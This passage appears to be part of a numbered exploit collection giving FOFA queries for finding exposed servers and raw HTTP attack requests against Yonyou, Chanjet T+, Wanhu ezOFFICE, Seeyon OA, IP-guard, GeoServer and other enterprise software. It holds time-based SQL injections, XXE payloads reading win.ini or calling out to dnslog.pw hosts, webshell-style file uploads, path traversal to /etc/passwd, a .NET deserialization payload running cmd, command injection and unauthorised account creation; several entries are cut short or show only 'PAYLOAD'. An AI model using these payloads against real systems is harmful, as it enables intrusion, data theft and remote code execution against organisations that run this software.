GET /portal/pt/downTax/download?pageId=login&classid=1'waitfor+delay+'0:0:5'-- HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36
Content-Type: application/x-www-form-urlencoded
Accept-Encoding: gzip, deflate
Accept: */*
Connection: keep-alive

34. Yonyou NC warningDetailInfo endpoint SQL injection
FOFA:app="用友-UFIDA-NC"
GET /ebvp/infopub/warningDetailInfo?pageId=login&pkMessage=1'waitfor+delay+'0:0:5'-- HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36
Content-Type: application/x-www-form-urlencoded
Accept-Encoding: gzip, deflate
Accept: */*
Connection: keep-alive

35. Yonyou NC-Cloud importhttpscer arbitrary file upload
FOFA:app="用友-NC-Cloud"
POST /nccloud/mob/pfxx/manualload/importhttpscer HTTP/1.1
Host: 203.25.218.166:8888
User-Agent: Mozilla/5.0 (Windows NT 5.1; rv:5.0) Gecko/20100101 Firefox/5.0 info
Accept-Encoding: gzip, deflate
Accept: */*
Connection: close
accessToken: eyJhbGciOiJIUzUxMiJ9.eyJwa19ncm91cCI6IjAwMDE2QTEwMDAwMDAwMDAwSkI2IiwiZGF0YXNvdXJjZSI6IjEiLCJsYW5nQ29kZSI6InpoIiwidXNlclR5cGUiOiIxIiwidXNlcmlkIjoiMSIsInVzZXJDb2RlIjoiYWRtaW4ifQ.XBnY1J3bVuDMYIfPPJXb2QC0Pdv9oSvyyJ57AQnmj4jLMjxLDjGSIECv2ZjH9DW5T0JrDM6UHF932F5Je6AGxA
Content-Length: 190
Content-Type: multipart/form-data; boundary=fd28cb44e829ed1c197ec3bc71748df0

--fd28cb44e829ed1c197ec3bc71748df0
Content-Disposition: form-data; name="file"; filename="./webapps/nc_web/1.jsp"

<%out.println(1111*1111);%>
--fd28cb44e829ed1c197ec3bc71748df0--

36. Yonyou NC-Cloud soapFormat XXE
FOFA:body="/Client/Uclient/UClient.exe"||body="ufida.ico"||body="nccloud"||body="/api/uclient/public/"
POST /uapws/soapFormat.ajax HTTP/1.1
Host: 192.168.40.130:8989
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/109.0
Content-Length: 263
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Connection: close
Content-Type: application/x-www-form-urlencoded
Upgrade-Insecure-Requests: 1

msg=<!DOCTYPE foo[<!ENTITY xxe1two SYSTEM "file:///C://windows/win.ini"> ]><soap:Envelope xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/"><soap:Body><soap:Fault><faultcode>soap:Server%26xxe1two%3b</faultcode></soap:Fault></soap:Body></soap:Envelope>%0a

37. Yonyou NC-Cloud IUpdateService XXE
FOFA:body="/Client/Uclient/UClient.exe"||body="ufida.ico"||body="nccloud"||body="/api/uclient/public/"
POST /uapws/service/nc.uap.oba.update.IUpdateService HTTP/1.1
Host: 192.168.40.130:8989
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36
Content-Length: 421
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Connection: close
Content-Type: text/xml;charset=UTF-8
SOAPAction: urn:getResult
Upgrade-Insecure-Requests: 1

<soapenv:Envelope xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/" xmlns:iup="http://update.oba.uap.nc/IUpdateService">
<soapenv:Header/>
<soapenv:Body>
<iup:getResult>
<!--type: string-->
<iup:string><![CDATA[
<!DOCTYPE xmlrootname [<!ENTITY % aaa SYSTEM "http://c2vkbwbs.dnslog.pw">%aaa;%ccc;%ddd;]>
<xxx/>]]></iup:string>
</iup:getResult>
</soapenv:Body>
</soapenv:Envelope>

38. Yonyou U8 Cloud smartweb2.RPC.d XXE
FOFA:app="用友-U8-Cloud"
POST /hrss/dorado/smartweb2.RPC.d?__rpc=true HTTP/1.1
Host: 192.168.40.131:8088
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 12_10) AppleWebKit/600.1.25 (KHTML, like Gecko) Version/12.0 Safari/1200.1.25
Content-Length: 260
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Connection: close
Content-Type: application/x-www-form-urlencoded

__viewInstanceId=nc.bs.hrss.rm.ResetPassword~nc.bs.hrss.rm.ResetPasswordViewModel&__xml=<!DOCTYPE z [<!ENTITY Password SYSTEM "file:///C://windows//win.ini" >]><rpc transaction="10" method="resetPwd"><vps><p name="__profileKeys">%26Password;</p ></vps></rpc>

39. Yonyou U8 Cloud RegisterServlet SQL injection
FOFA:title="u8c"
POST /servlet/RegisterServlet HTTP/1.1
Host: 192.168.86.128:8089
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/54.0.2866.71 Safari/537.36
Connection: close
Content-Length: 85
Accept: */*
Accept-Language: en
Content-Type: application/x-www-form-urlencoded
X-Forwarded-For: 127.0.0.1
Accept-Encoding: gzip

usercode=1' and substring(sys.fn_sqlvarbasetostr(HashBytes('MD5','123456')),3,32)>0--

40. Yonyou U8-Cloud XChangeServlet XXE
FOFA:app="用友-U8-Cloud"
POST /service/XChangeServlet HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/107.0.0.0 Safari/537.36
Content-Type: text/xml
Connection: close

<!DOCTYPE r [<!ELEMENT r ANY ><!ENTITY xxe SYSTEM "http://farr9frh.dnslog.pw">]><r><a>&xxe;</a ></r>

41. Yonyou U8 Cloud MeasureQueryByToolAction SQL injection
FOFA:app="用友-U8-Cloud"
GET /service/~iufo/com.ufida.web.action.ActionServlet?action=nc.ui.iufo.query.measurequery.MeasureQueryByToolAction&method=execute&query_id=1%27);WAITFOR+DELAY+%270:0:5%27--+ HTTP/1.1
Host:
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
Content-Type: application/json
Accept-Encoding: gzip
Connection: close

42. Yonyou GRP-U8 SmartUpload01 file upload
FOFA:app="用友-GRP-U8"
POST /u8qx/SmartUpload01.jsp HTTP/1.1
Host: x.x.x.x
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryzhvrkrqt
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2062.124 Safari/537.36

PAYLOAD

http://x.x.x.x/jatoolsreport?file=/1.pdf&as=dhtml

43. Yonyou GRP-U8 userInfoWeb SQL injection leading to RCE
FOFA:app="用友-GRP-U8"
POST /services/userInfoWeb HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36(KHTML, like Gecko) Chrome/93.0.4577.63 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Connection: close
SOAPAction:
Content-Type: text/xml;charset=UTF-8

<soapenv:Envelope xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/" xmlns:ser="http://service.pt.midas.ufgov.com">
   <soapenv:Header/>
   <soapenv:Body>
      <ser:getUserNameById soapenv:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/">
         <userId xsi:type="soapenc:string" xmlns:soapenc="http://schemas.xmlsoap.org/soap/encoding/">';waitfor delay '0:0:5'--</userId>
      </ser:getUserNameById>
   </soapenv:Body>
</soapenv:Envelope>

44. Yonyou GRP-U8 bx_dj_check.jsp SQL injection
FOFA:app="用友-GRP-U8"
GET /u8qx/bx_dj_check.jsp?djlxdm=OER&djid=1';waitfor+delay+'0:0:5'-- HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/110.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Connection: close

45. Yonyou GRP-U8 ufgovbank XXE
FOFA:app="用友-GRP-U8"
POST /ufgovbank HTTP/1.1
Host: 192.168.40.130:222
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:104.0) Gecko/20100101 Firefox/104.0
Connection: close
Content-Length: 161
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Content-Type: application/x-www-form-urlencoded
Accept-Encoding: gzip

reqData=<?xml version="1.0"?>
<!DOCTYPE foo SYSTEM "http://c2vkbwbs.dnslog.pw">&signData=1&userIP=1&srcFlag=1&QYJM=0&QYNC=adaptertest

46. Yonyou GRP-U8 sqcxIndex.jsp SQL injection
FOFA:app="用友-GRP-U8"
GET /u8qx/sqcxIndex.jsp?key=1');+waitfor+delay+'0:0:5'-- HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/112.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Connection: close

47. Yonyou GRP A++Cloud government finance cloud arbitrary file read
FOFA:body="/pf/portal/login/css/fonts/style.css"
GET /ma/emp/maEmp/download?fileName=../../../etc/passwd HTTP/1.1
Host: x.x.x.x
Cache-Control: max-age=0
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate, br
Accept-Language: zh-CN,zh;q=0.9
If-Modified-Since: Wed, 11 Oct 2023 05:16:05 GMT
Connection: close

48. Yonyou U8 CRM swfupload arbitrary file upload
FOFA:title="用友U8CRM"
POST /ajax/swfupload.php?DontCheckLogin=1&vname=file HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Content-Type: multipart/form-data;boundary=----269520967239406871642430066855
------269520967239406871642430066855
Content-Disposition: form-data; name="file"; filename="s.php"
1231
Content-Type: application/octet-stream
------269520967239406871642430066855
Content-Disposition: form-data; name="upload"
upload
------269520967239406871642430066855--

49. Yonyou U8 CRM uploadfile.php endpoint arbitrary file upload
FOFA:body="用友U8CRM"

POST /ajax/uploadfile.php?DontCheckLogin=1&vname=file HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0
Content-Length: 329
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Connection: close
Content-Type: multipart/form-data; boundary=---------------------------vvv3wdayqv3yppdxvn3w

-----------------------------vvv3wdayqv3yppdxvn3w
Content-Disposition: form-data; name="file"; filename="%s.php "
Content-Type: application/octet-stream

wersqqmlumloqa
-----------------------------vvv3wdayqv3yppdxvn3w
Content-Disposition: form-data; name="upload"

upload
-----------------------------vvv3wdayqv3yppdxvn3w--

http://x.x.x.x/tmpfile/updB3CB.tmp.php

50. QDocs Smart School 6.4.1 filterRecords SQL injection
FOFA:body="close closebtnmodal"
POST /course/filterRecords/ HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36
Connection: close
Content-Length: 224
Accept: */*
Accept-Language: en
Content-Type: application/x-www-form-urlencoded
Accept-Encoding: gzip

searchdata[0][title]=&searchdata[0][searchfield]=1&searchdata[0][searchvalue]=1&searchdata[1][title]=1&searchdata[1][searchfield]=1=1 and extractvalue(1,concat(0x5e,(select md5(123456)),0x5e))%23&searchdata[1][searchvalue]=1

51. Yunshikong (云时空) social commerce ERP system validateLoginName SQL injection
FOFA:app="云时空社会化商业ERP系统"
GET /sys/user/validateLoginName?loginName=admin'+AND+4563=DBMS_PIPE.RECEIVE_MESSAGE(CHR(65),5)-- HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.198 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Connection: close

52. Weaver E-Office json_common.php SQL injection
FOFA:app="泛微-EOffice"
POST /building/json_common.php HTTP/1.1
Host: 192.168.86.128:8097
User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36
Connection: close
Content-Length: 87
Accept: */*
Accept-Language: en
Content-Type: application/x-www-form-urlencoded
Accept-Encoding: gzip

tfs=city` where cityId =-1 /*!50000union*/ /*!50000select*/1,2,md5(102103122) ,4#|2|333

53. DPtech VPN Service arbitrary file upload
FOFA:app="DPtech-SSLVPN"
/..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd

54. Chanjet T+ getstorewarehousebystore remote code execution
FOFA:app="畅捷通-TPlus"
Step 1: send the following request to the target; it executes a command that writes the given string into the given file
"/c echo 2WcBDoxC7JXhegsmOp6vJJ2dZBl > .2WcBDoxC7JXhegsmOp6vJJ2dZBl.txt"

Full request
POST /tplus/ajaxpro/Ufida.T.CodeBehind._PriorityLevel,App_Code.ashx?method=GetStoreWarehouseByStore HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/34.0.1847.137 Safari/4E423F
Content-Length: 593

{
  "storeID":{
    "__type":"System.Windows.Data.ObjectDataProvider, PresentationFramework, Version=4.0.0.0, Culture=neutral, PublicKeyToken=31bf3856ad364e35",
    "MethodName":"Start",
    "ObjectInstance":{
      "__type":"System.Diagnostics.Process, System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",
      "StartInfo":{
        "__type":"System.Diagnostics.ProcessStartInfo, System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",
        "FileName":"cmd",
        "Arguments":"/c echo 2WcBDoxC7JXhegsmOp6vJJ2dZBl > .2WcBDoxC7JXhegsmOp6vJJ2dZBl.txt"
      }
    }
  }
}

Step 2: visit the following URL
/tplus/.2WcBDoxC7JXhegsmOp6vJJ2dZBl.txt

55. Chanjet T+ getdecallusers information disclosure
FOFA:app="畅捷通-TPlus"
Step 1: obtain a Cookie from the
/tplus/ajaxpro/Ufida.T.SM.Login.UIP.LoginManager,Ufida.T.SM.Login.UIP.ashx?method=CheckPassword endpoint
Step 2: using the obtained Cookie, request
/tplus/sm/privilege/ajaxpro/Ufida.T.SM.UIP.Privilege.PreviligeControl,Ufida.T.SM.UIP.ashx?method=GetDecAllUsers

56. Chanjet T+ RRATableController,Ufida.T.DI.UIP.ashx deserialization RCE
FOFA: app="畅捷通-TPlus"
POST /tplus/ajaxpro/Ufida.T.DI.UIP.RRA.RRATableController,Ufida.T.DI.UIP.ashx?method=GetStoreWarehouseByStore HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/100.0.4896.127 Safari/537.36
Content-Type: application/json

{
  "storeID":{
    "__type":"System.Windows.Data.ObjectDataProvider, PresentationFramework, Version=4.0.0.0, Culture=neutral, PublicKeyToken=31bf3856ad364e35",
    "MethodName":"Start",
    "ObjectInstance":{
      "__type":"System.Diagnostics.Process, System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",
      "StartInfo": {
        "__type":"System.Diagnostics.ProcessStartInfo, System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",
        "FileName":"cmd", "Arguments":"/c ping 6qevyvmi.dnslog.pw"
      }
    }
  }
}

57. Chanjet T+ keyEdit.aspx SQL injection
FOFA:app="畅捷通-TPlus"
GET /tplus/UFAQD/keyEdit.aspx?KeyID=1%27%20and%201=(select%20@@version)%20--&preload=1 HTTP/1.1
Host: host
User-Agent: Mozilla/5.0 (Linux; Android 11; motorola edge 20 fusion) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/101.0.4951.61 Mobile Safari/537.36
Accept-Charset: utf-8
Accept-Encoding: gzip, deflate
Connection: close

58. Chanjet T+ KeyInfoList.aspx SQL injection
FOFA:app="畅捷通-TPlus"
GET /tplus/UFAQD/KeyInfoList.aspx?preload=1&zt=')AND+1+IN+(SELECT+sys.fn_varbintohexstr(hashbytes('MD5','123456')))--+ HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Linux; Android 11; motorola edge 20 fusion) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/101.0.4951.61 Mobile Safari/537.36
Accept-Charset: utf-8
Accept-Encoding: gzip, deflate
Connection: close

59. XETUX software dynamiccontent.properties.xhtml remote code execution
FOFA: title="@XETUX" && title="XPOS" && body="BackEnd"
POST /xc-one-pos/javax.faces.resource/dynamiccontent.properties.xhtml HTTP/1.1
Host: 192.168.86.128:9090
User-Agent: Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.2309.372 Safari/537.36
Connection: close
Content-Length: 1669
Accept: */*
Accept-Language: en
Content-Type: application/x-www-form-urlencoded
Accept-Encoding: gzip

PAYLOAD


60. Byzoro Smart management platform importexport.php SQL injection
FOFA:title="Smart管理平台"
GET /importexport.php?sql=c2VsZWN0IDEsdXNlcigpLDM=&type=exportexcelbysql HTTP/1.1
Host:
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/121.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Connection: close


61. 浙大恩特 customer resource management system fileupload arbitrary file upload
FOFA: title="欢迎使用浙大恩特客户资源管理系统"
POST /entsoft_en/entereditor/jsp/fileupload.jsp?filename=8uxssX66eqrqtKObcVa0kid98xa.jsp HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
Connection: close
Content-Length: 27
Accept: */*
Accept-Encoding: gzip, deflate
Accept-Language: en
Content-Type: application/x-www-form-urlencoded

8uxssX66eqrqtKObcVa0kid98xa


62. IP-guard WebServer remote command execution
FOFA:"IP-guard" && icon_hash="2030860561"
GET /ipg/static/appr/lib/flexpaper/php/view.php?doc=11.jpg&format=swf&isSplit=true&page=||echo+"09kdujzKJDLinkQTLfGzMMKDJ23HJ"+>09kdujzKJDLinkQTLfGzMMKDJ23HJ.txt HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/55.0.2919.83 Safari/537.36
Connection: close
Accept: */*
Accept-Language: en
Accept-Encoding: gzip


Then request:

GET /ipg/static/appr/lib/flexpaper/php/09kdujzKJDLinkQTLfGzMMKDJ23HJ.txt HTTP/1.1
Host: x.x.x.x


63. IP-guard WebServer arbitrary file read
IP-guard < 4.82.0609.0
FOFA:icon_hash="2030860561"
POST /ipg/appr/MApplyList/downloadFile_client/getdatarecord HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/122.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Connection: close
Content-Type: application/x-www-form-urlencoded

path=..%2Fconfig.ini&filename=1&action=download&hidGuid=1v%0D%0A

64. 捷诚 management information system CWSFinanceCommon SQL injection
FOFA:body="/Scripts/EnjoyMsg.js"
POST /EnjoyRMIS_WS/WS/APS/CWSFinanceCommon.asmx HTTP/1.1
Host: 192.168.86.128:9001
User-Agent: Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.36
Connection: close
Content-Length: 369
Accept: */*
Accept-Language: en
Content-Type: text/xml; charset=utf-8
Accept-Encoding: gzip

<?xml version="1.0" encoding="utf-8"?>
<soap:Envelope xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/">
  <soap:Body>
    <GetOSpById xmlns="http://tempuri.org/">
      <sId>1';waitfor delay '0:0:5'--+</sId>
    </GetOSpById>
  </soap:Body>
</soap:Envelope>


65. 优卡特脸爱云 all-in-one face recognition smart management platform 1.0.55.0.0.1 privilege bypass
FOFA:title="欢迎使用脸爱云 一脸通智慧管理平台"
A 200 response means the account test123456/123456 was created successfully.
POST /SystemMng.ashx HTTP/1.1
Host:
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1)
Accept-Encoding: gzip, deflate
Accept: */*
Connection: close
Accept-Language: en
Content-Length: 174

operatorName=test123456&operatorPwd=123456&operpassword=123456&operatorRole=00&visible_jh=%E8%AF%B7%E9%80%89%E6%8B%A9&visible_dorm=%E8%AF%B7%E9%80%89%E6%8B%A9&funcName=addOperators


66. Wanhu ezOFFICE collaborative management platform SendFileCheckTemplateEdit SQL injection
FOFA:app="万户ezOFFICE协同管理平台"

GET /defaultroot/public/iWebOfficeSign/Template/SendFileCheckTemplateEdit.jsp?RecordID=1'%20UNION%20ALL%20SELECT%20sys.fn_sqlvarbasetostr(HashBytes(%27MD5%27,%27102103122%27))%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL-- HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2762.73 Safari/537.36
Connection: close
Accept: */*
Accept-Language: en
Accept-Encoding: gzip


If lines 42 and 43 of the response contain the string 6cfe798ba8e5b85feb50164c59f4bec9, the vulnerability is present.

67. Wanhu ezOFFICE wpsservlet arbitrary file upload
FOFA:app="万户网络-ezOFFICE"
The newdocId and filename parameters set the name of the written file, dir sets the directory it is written to, and fileType sets the file extension.
POST /defaultroot/wpsservlet?option=saveNewFile&newdocId=apoxkq&dir=../platform/portal/layout/&fileType=.jsp HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:52.0) Gecko/20100101 Firefox/52.0
Content-Length: 173
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3
Connection: close
Content-Type: multipart/form-data; boundary=ufuadpxathqvxfqnuyuqaozvseiueerp
DNT: 1
Upgrade-Insecure-Requests: 1

--ufuadpxathqvxfqnuyuqaozvseiueerp
Content-Disposition: form-data; name="NewFile"; filename="apoxkq.jsp"

<% out.print("sasdfghjkj");%>
--ufuadpxathqvxfqnuyuqaozvseiueerp--


The uploaded file is served at /defaultroot/platform/portal/layout/apoxkq.jsp

68. Wanhu ezOFFICE wf_printnum.jsp SQL injection
FOFA:app="万户ezOFFICE协同管理平台"
GET /defaultroot/platform/bpm/work_flow/operate/wf_printnum.jsp;.js?recordId=1;WAITFOR%20DELAY%20%270:0:5%27-- HTTP/1.1
Host: {{host}}
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/99.0.4844.84 Safari/537.36
Accept: application/signed-exchange;v=b3;q=0.7,*/*;q=0.8
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Connection: close


69. Wanhu ezOFFICE contract_gd.jsp SQL injection
FOFA:app="万户ezOFFICE协同管理平台"
GET /defaultroot/modules/subsidiary/contract/contract_gd.jsp;.js?gd=1&gd_startUserCode=1%27%3Bwaitfor%20delay%20%270%3A0%3A5%27-- HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/122.0.0.0 Safari/537.36
Accept-Encoding: gzip, deflate
Accept: */*
Connection: keep-alive


70. Wanhu ezEIP success command execution
FOFA:app="万户网络-ezEIP"
POST /member/success.aspx HTTP/1.1
Host: {{Hostname}}
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.116 Safari/537.36
SID: dHlwZSBDOlxXaW5kb3dzXHdpbi5pbmk=
Content-Type: application/x-www-form-urlencoded
TYPE: C
Content-Length: 16702

__VIEWSTATE=PAYLOAD


71. 邦永 PM2 project management system Global_UserLogin.aspx SQL injection
FOFA:body="PM2项目管理系统BS版增强工具.zip"
GET /Global/Global_UserLogin.aspx?accId=1%27%3BWAITFOR+DELAY+%270%3A0%3A5%27--&loginCode&password&type HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36
Connection: close
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Upgrade-Insecure-Requests: 1


72. Seeyon OA getAjaxDataServlet XXE
FOFA:app="致远互联-OA"
POST /seeyon/m-signature/RunSignature/run/getAjaxDataServlet HTTP/1.1
Host: 192.168.40.131:8099
User-Agent: Mozilla/5.0 (X11; OpenBSD i386) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.125 Safari/537.36
Connection: close
Content-Length: 583
Content-Type: application/x-www-form-urlencoded
Accept-Encoding: gzip

S=ajaxColManager&M=colDelLock&imgvalue=lr7V9+0XCEhZ5KUijesavRASMmpz%2FJcFgNqW4G2x63IPfOy%3DYudDQ1bnHT8BLtwokmb%2Fk&signwidth=4.0&signheight=4.0&xmlValue=%3C%3Fxml+version%3D%221.0%22%3F%3E%0D%0A%3C%21DOCTYPE+foo+%5B%0D%0A++%3C%21ELEMENT+foo+ANY+%3E%0D%0A++%3C%21ENTITY+xxe+SYSTEM+%22file%3A%2F%2F%2Fc%3A%2Fwindows%2Fwin.ini%22+%3E%0D%0A%55D%3E%0D%0A%3CSignature%3E%3CField%3E%3Ca+Index%3D%22ProtectItem%22%3Etrue%3C%2Fa%3E%3Cb+Index%3D%22Caption%22%3Ecaption%3C%2Fb%3E%3Cc+Index%3D%22ID%22%3Eid%3C%2Fc%3E%3Cdd+Index%3D%22VALUE%22%3E%26xxe%3B%3C%2Fd%3E%3C%2FField%3E%3C%2FSignature%3E


73. GeoServer wms remote code execution
FOFA:icon_hash="97540678"
POST /geoserver/wms HTTP/1.1
Host:
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2762.73 Safari/537.36
Content-Length: 1981
Accept-Encoding: gzip, deflate
Connection: close
Content-Type: application/xml
SL-CE-SUID: 3

